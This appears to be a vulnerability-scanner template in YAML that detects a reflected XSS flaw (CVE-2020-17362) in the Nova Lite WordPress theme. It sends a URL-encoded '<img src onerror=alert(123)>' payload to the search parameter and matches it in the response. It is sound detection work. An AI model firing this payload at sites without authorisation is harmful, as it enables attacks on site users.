31 lines
741 B
YAML
31 lines
741 B
YAML
id: CVE-2020-17362
|
|
|
|
info:
|
|
name: Nova Lite < 1.3.9 - Unauthenticated Reflected Cross-Site Scripting (XSS)
|
|
author: daffainfo
|
|
severity: medium
|
|
description: search.php in the Nova Lite theme before 1.3.9 for WordPress allows Reflected XSS.
|
|
reference: https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4
|
|
tags: cve,cve2020,wordpress,xss,wp-plugin
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/?s=%3Cimg%20src%20onerror=alert(123)%3E'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "<img src onerror=alert(123)>"
|
|
part: body
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|